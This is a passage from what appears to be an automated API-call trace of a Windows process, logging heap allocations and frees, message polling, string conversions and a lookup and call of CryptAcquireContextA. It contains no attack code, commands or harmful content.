(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0209.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0209.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0209.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0209.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0209.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0209.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.296] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0209.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0209.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0209.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0209.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0209.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0209.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0209.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0209.298] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0209.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0209.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0209.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0209.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0209.299] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0209.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a08 | out: hHeap=0x25c0000) returned 1 [0209.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0209.299] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad27a8) returned 1 [0209.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0209.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0209.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0209.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0209.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0209.303] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0209.304] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0209.304] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0209.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17b8 [0209.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0209.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0209.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0209.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0209.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0209.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0209.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa868 [0209.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0209.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0209.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0209.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0209.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.306] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0209.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0209.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0209.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0209.306] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0209.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0209.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0209.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0209.307] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0209.307] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0209.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0209.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0209.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.308] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0209.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.308] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.308] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.308] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0209.308] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0209.308] PeekMessageW (in: 